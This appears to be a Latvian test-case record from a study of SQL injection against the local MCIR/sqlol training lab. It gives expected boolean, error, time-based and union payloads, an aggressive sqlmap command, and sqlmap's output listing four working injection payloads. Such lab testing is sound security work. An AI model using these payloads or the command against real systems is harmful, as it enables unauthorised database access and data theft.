=================================================================================
1. Īpašība: tiek no ievades lauka nodzēstas pēdiņas, ievadāmā vērtība ir skaitlis
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?inject_string=1 OR 1=1
3.2. error-based: ?inject_string=1asd
3.3. time-based: ?inject_string=1 or sleep(1)%23
3.4. union: ?inject_string=1 union select 1%23
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 16101200 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=high&sanitization_type=keyword&sanitization_params=%27&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1&location=where_int&submit=Inject%21" -p inject_string --risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 AND 9309=9309&location=where_int&submit=Inject!

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 AND GTID_SUBSET(CONCAT(0x7176716271,(SELECT (ELT(8761=8761,1))),0x716b767a71),8761)&location=where_int&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 AND (SELECT 7291 FROM (SELECT(SLEEP(5)))DSNU)&location=where_int&submit=Inject!

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 UNION ALL SELECT CONCAT(0x7176716271,0x456375666b697153745848574c57546f437974726a724a504a41776449517469504c7270585a766a,0x716b767a71)-- -&location=where_int&submit=Inject!
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6
